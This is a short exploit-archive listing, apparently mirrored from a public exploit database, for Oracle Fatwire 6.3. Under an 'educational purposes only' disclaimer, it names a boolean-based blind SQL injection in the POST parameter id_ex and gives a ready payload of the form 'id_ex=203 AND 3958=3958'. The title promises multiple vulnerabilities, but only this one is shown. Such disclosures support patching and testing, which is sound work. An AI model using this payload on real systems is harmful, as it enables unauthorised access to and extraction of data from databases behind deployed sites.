Exploits / Vulnerability Discovered : 2021-07-29 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Oracle fatwire 6.3 multiple vulnerabilities is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage: https://www.oracle.com/index.html
# Version: 6.3
# Tested on: CentOS
The vulnerable parameter is : id_ex (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND
3958=3958&command=xxxxxT